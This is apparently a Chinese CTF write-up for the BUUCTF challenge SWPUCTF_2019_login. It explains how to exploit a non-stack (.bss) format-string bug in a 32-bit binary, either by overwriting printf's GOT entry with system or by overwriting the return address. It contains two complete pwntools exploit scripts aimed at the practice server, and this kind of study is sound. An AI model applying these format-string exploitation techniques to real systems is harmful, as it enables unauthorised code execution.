BUU_SWPUCTF_2019_login非栈上格式化字符串

最新推荐文章于 2024-03-30 01:07:01 发布
最新推荐文章于 2024-03-30 01:07:01 发布
阅读量277 收藏 1
点赞数 2
分类专栏: 刷题记录 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70452545/article/details/130282750
版权

对于栈上的格式化字符串可以通过直接将对应地址写入栈中,然后利用三链对任意写入地址修改,非栈上也就是不能直接写入,利用格式化字符串一样可以修改,只是要麻烦一点

ELF分析

32位、2.27libc、got表可修改
在这里插入图片描述

题目分析

输入name

无限循环,直到输入wllmmllw,这里存在明显格式化字符串漏洞
在这里插入图片描述
这里s1是在bss段上,所以只能利用格式化字符串来把栈上写入got地址
在这里插入图片描述
利用ebp作为三链,先将printf_got表写入栈上,再修改printf_got内容为system,然后输入sh就可以get shell了
在这里插入图片描述

思路实现

因为要修改栈地址和got表,所以先泄露栈地址和libc地址

#泄露libc
pay = b'%15$p'
io.sendlineafter("Please input your password: ",pay)
io.recvuntil("This is the wrong password: 0x")
libc_start_call_main = int(io.recv(8),16)-241
print("libc_start_call_main-->",hex(libc_start_call_main))

#泄露栈地址
pay = b'%6$p'
io.sendlineafter("Try again!\n",pay)
io.recvuntil("This is the wrong password: ")
stack_adr = int(io.recvuntil(b'\n')[:-1],16)-0x28

然后在栈上写入printf_got地址,因为got表是0x804b开头,和我们所写入的name_adr地址开头一样,所以这里选择将上图存放‘aaaa’的0xcec4和0xced4结尾的栈地址修改为存放got表

printf_got = elf.got['printf']
printf_got_low4 = printf_got & 0xffff
printf_got_hig4 = (printf_got>>16)&0xffff
aim1 = (stack_adr&0xffff)+0x14   #5
aim2 = (stack_adr&0xffff)+0x24    #9

pay = b'%'+str(aim1).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)
pay = b'%'+str(printf_got_low4).encode("utf-8")+b'c%10$hn'
io.sendlineafter("Try again!\n",pay)

pay = b'%'+str(aim2).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)
pay = b'%'+str(printf_got_low4+2).encode("utf-8")+b'c%10$hn'
io.sendlineafter("Try again!\n",pay)

这之后栈:
(截图是多次gdb调试的,所以地址会有略微不同,看偏移位置就可以了)
在这里插入图片描述
然后就可以修改printf_got表内容了,注意!这里要一次性修改,不能分两次,因为还要执行printf("This is the wrong password: ");,所以分次修改会报错

打远程还有应该小细节,我用all-in-one下载的2.27是打不通的,libcsearcher以下结果选1才能打通,不要被_amd64迷惑了
在这里插入图片描述

完整EXP1

from pwn import *
from LibcSearcher import *
from time import sleep	
context(log_level='debug',os='linux',arch='i386')
pwnfile = './_SWPUCTF_2019_login'
io=process(pwnfile)
io=remote('node4.buuoj.cn',25049)
elf = ELF(pwnfile)	
def debug():
	gdb.attach(io)
	pause()
io.sendlineafter("Please input your name: ",b'aaaa')
#泄漏libc
pay = b'%15$p'
io.sendlineafter("Please input your password: ",pay)
io.recvuntil("This is the wrong password: 0x")
libc_start_call_main = int(io.recv(8),16)-241
print("libc_start_call_main-->",hex(libc_start_call_main))

libc = LibcSearcher('__libc_start_main',libc_start_call_main)
libc_base = libc_start_call_main - libc.dump('__libc_start_main')
print("libc_base-->",hex(libc_base))
sys_adr = libc_base + libc.dump('system')
printf_got = elf.got['printf']
sleep(0.5)
#泄露栈地址
pay = b'%6$p'
io.sendlineafter("Try again!\n",pay)
io.recvuntil("This is the wrong password: ")
stack_adr = int(io.recvuntil(b'\n')[:-1],16)-0x28
print("stack_adr-->",hex(stack_adr))
printf_got_low4 = printf_got & 0xffff
printf_got_hig4 = (printf_got>>16)&0xffff
aim1 = (stack_adr&0xffff)+0x14   #5
aim2 = (stack_adr&0xffff)+0x24    #9
print("printf_got-->",hex(printf_got))
print("printf_got_low4-->",hex(printf_got_low4))
print("printf_got_hig4-->",hex(printf_got_hig4))
print("aim1-->",hex(aim1))
print("aim2-->",hex(aim2))
#栈上写入printf_got及+2
pay = b'%'+str(aim1).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)
pay = b'%'+str(printf_got_low4).encode("utf-8")+b'c%10$hn'
io.sendlineafter("Try again!\n",pay)
sleep(0.5)
pay = b'%'+str(aim2).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)
pay = b'%'+str(printf_got_low4+2).encode("utf-8")+b'c%10$hn'
io.sendlineafter("Try again!\n",pay)
#debug()
sleep(0.5)
#一次性修改print_got
sys_low4 = sys_adr & 0xffff
sys_hig4 = (sys_adr>>16) & 0xffff
print("sys_adr-->",hex(sys_adr))
print("sys_low4-->",hex(sys_low4))
print("sys_hig4-->",hex(sys_hig4))

pay = b'%'+str(sys_low4).encode("utf-8")+b'c%5$hn'
pay += b'%'+str(sys_hig4-sys_low4).encode("utf-8")+b'c%9$hn'
print("pay-->",hex(len(pay)))
io.sendlineafter("Try again!\n",pay)

sleep(0.5)
io.sendlineafter("Try again!",b'cat flag')
io.interactive()

另一个思路

因为是32位,所以我们可以控制返回地址函数的参数,即可以修改返回地址为system,把参数修改为/bin/sh。
稍微观察一下栈,发现我们所输入的name刚好处于返回地址的第一个参数上,所以只要修改返回地址为system即可
这里是受这位师傅wp启发: 不想修电脑师傅的博客
在这里插入图片描述

注意!

1、返回地址没有用call的话,会把返回地址的下一个位置作为返回地址函数的返回地址
即ebp - system - system的返回地址(用不到,垃圾数据填充) - system的参数1
2、调试exp时,返回地址会是system+1,这里是因为远程堆栈不平衡

EXP2

from pwn import *
from LibcSearcher import *
from time import sleep	
context(log_level='debug',os='linux',arch='i386')
pwnfile = './_SWPUCTF_2019_login'
#io=process(pwnfile)
io=remote('node4.buuoj.cn',25063)
elf = ELF(pwnfile)	
def debug():
	gdb.attach(io)
	pause()
io.sendlineafter("Please input your name: ",b'/bin/sh\x00')

#泄漏libc
pay = b'%15$p'
io.sendlineafter("Please input your password: ",pay)
io.recvuntil("This is the wrong password: 0x")
libc_start_call_main = int(io.recv(8),16)-241
libc = LibcSearcher('__libc_start_main',libc_start_call_main)
libc_base = libc_start_call_main - libc.dump('__libc_start_main')
print("libc_base-->",hex(libc_base))
sys_adr = libc_base + libc.dump('system')
#sys_adr = elf.plt['system']

#泄漏栈地址
pay = b'%6$p'
io.sendlineafter("Try again!\n",pay)
io.recvuntil("This is the wrong password: ")
stack_adr = int(io.recvuntil(b'\n')[:-1],16)-0x28
print("stack_adr-->",hex(stack_adr))

#修改返回地址
re_adr = stack_adr + 0x1c
re_adr_low4 = re_adr & 0xffff
#对system切片
sys_adr = str(hex(sys_adr))
print("sys_adr-->",sys_adr)
b = int(sys_adr,16) & 0xff
print("b-->",hex(b))
pay = b'%'+str(re_adr_low4).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)

#这里远程用system+1,  %0刚好算一个字符
pay = b'%'+str(b).encode("utf-8")+b'c%10$hn'
#pay = b'%10$hn'
io.sendlineafter("Try again!\n",pay)

sys_adr = sys_adr[:-2]
a = int(sys_adr,16) & 0xff
print("sys_adr-->",sys_adr)
print("a-->",hex(a))
pay = b'%'+str(re_adr_low4+1).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)
pay = b'%'+str(a).encode("utf-8")+b'c%10$hn'
io.sendlineafter("Try again!\n",pay)

sys_adr = sys_adr[:-2]
a = int(sys_adr,16) & 0xff
print("sys_adr-->",sys_adr)
print("a-->",hex(a))
pay = b'%'+str(re_adr_low4+2).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)
pay = b'%'+str(a).encode("utf-8")+b'c%10$hn'
io.sendlineafter("Try again!\n",pay)

sys_adr = sys_adr[:-2]
a = int(sys_adr,16) & 0xff
print("sys_adr-->",sys_adr)
print("a-->",hex(a))
pay = b'%'+str(re_adr_low4+3).encode("utf-8")+b'c%6$hn'
io.sendlineafter("Try again!\n",pay)
pay = b'%'+str(a).encode("utf-8")+b'c%10$hn'
io.sendlineafter("Try again!\n",pay)

#debug()
pay = b'wllmmllw'
io.sendlineafter("Try again!\n",pay)
io.interactive()
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUUCTF之“SWPUCTF_2019_login
Probeginner的博客
01-01 1143
格式化字符串在bss段上的情况:间接修改printf.got表为system,,, ebp对应的地址映射比较关键
SWPUCTF_2019_login
z1r0的博客
03-09 608
SWPUCTF_2019_login 查看保护 格式化字符串漏洞,但是s1和正常的栈上格式化不一样,这里是非栈上。 攻击思路:因为是非栈上,所以需要借助ebp这里的链子来实现将printf_got改为system_addr。 1.首先借助这个格式化漏洞拿到libc和ebp的地址。 2.接下来就是借助ebp这条链子将printf_got改到这个链子上,最后的结构为下图 用%6$hhn来修改%10$处的数据然后%10$hhn来修改%14$处的数据最后使得使得%14$处为printf的GOT表地址,同样的
非栈上的格式化字符串漏洞
Grxer的博客
03-20 875
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got表也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
非栈格式化字符串
Chuang__的博客
03-30 771
非栈格式化字符串,BeginCTF,Bad_cat_CTF 的两道例题
【Pwn】SWPUCTF_2019_login
Nothing
12-09 1214
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
cipher_CIPHER_
09-29
它们基于特定的数学原理,如对称密钥加密(如AES)、非对称密钥加密(如RSA)或哈希函数(如SHA)。这些算法确保了数据在传输过程中的安全性,防止未经授权的访问或篡改。 描述中提到的"document for Hi3520D"很...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
[CTF]PWN--非栈格式化字符串漏洞
2301_79880752的博客
02-26 2464
一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非栈格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。本文主要为大家介绍BSS段上的格式化字符串漏洞的解法。
非栈上的格式化字符串漏洞利用
qq_52877079的博客
03-25 438
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用。
非栈格式化字符串漏洞
2302_79813730的博客
02-21 1030
如图,红色框为a-b-c,我们可以利用格式化字符串漏洞更改c为蓝色框的第一个地址,这样我们就得到a-b-c-d,有这个我们一定可以找到b-c-d,这样我们就可以把d改成one_gadget的地址,d正好是main函数的返回地址,我们一般修改的也是这个。但这样实际是行不通的,通过调试我们可以看到三次更改的都是尾字节,为什么呢,原因就在于非栈上,每一次更改都要有对应的返回地址,这是第一次的,第二次要修改的是中间两字节,在原本基础上+2就可以了,第三次原理相似(想学堆上的可以自己去搜索,我目前也没学到。
非栈上的格式化字符串利用例题讲解
fzucaicai的博客
03-06 819
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
关于在栈上格式化字符串漏洞的利用方法
cainiao78777的博客
03-18 518
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地址(任意)第二次修改printf的返回地址为one_gadget去getshell。
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1726
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
手搓payload+非栈格式化字符串
2301_79880074的博客
02-22 1307
格式化字符串漏洞类型题中我们可以利用payload = fmtstr_payload(offset,{printf_got:system_plt})这个工具去修改地址,但是这个工具产生的字节数是很大的,有时候我们是无法去正常利用的,我们需要去自己构造payload修改地址。
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值